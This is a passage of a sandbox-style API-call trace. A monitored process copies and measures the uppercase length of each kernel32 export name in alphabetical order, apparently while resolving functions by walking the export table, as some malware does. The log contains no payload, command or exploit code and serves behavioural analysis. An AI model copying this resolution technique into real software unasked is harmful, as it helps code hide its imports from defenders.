returned 14 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0077.770] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0077.770] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.771] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.771] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.771] lstrlenA (lpString="CANCELIO") returned 8 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.771] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.771] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.771] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.771] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.771] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.771] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.771] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.771] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.771] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.771] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.771] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.771] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.771] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.771] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.771] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.771] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.771] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.772] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.772] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.772] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.772] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.772] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.772] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.772] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.772] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.772] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.772] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.772] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.772] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.772] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.772] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.772] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.773] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.773] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.773] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.773] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.773] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.773] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.773] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.773] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.773] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.773] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.773] lstrlenA (lpString="COPYFILEA") returned 9 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.773] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.773] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.773] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.773] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.773] lstrlenA (lpString="COPYFILEW") returned 9 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.773] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.773] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.773] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.774] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.774] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.774] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.774] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.774] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.774] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.774] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.774] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.774] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.774] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.774] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.774] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.774] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.774] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.774] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.774] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.774] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.774] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.774] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.774] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.775] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.775] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.775] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.775] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.775] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.775] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.775] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.775] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.775] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.775] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.775] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.775] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.775] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.775] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.775] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.775] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.775] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.775] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.775] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.775] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.776] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.776] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.776] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.776] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.776] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.776] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.776] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.776] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.776] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.776] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.776] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.776] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.776] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.776] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.776] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.776] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.776] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.776] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.776] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.776] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.777] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.777] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.777] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.777] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.777] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.777] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.777] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.777] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.777] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.777] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.777] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.777] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.777] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.777] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") 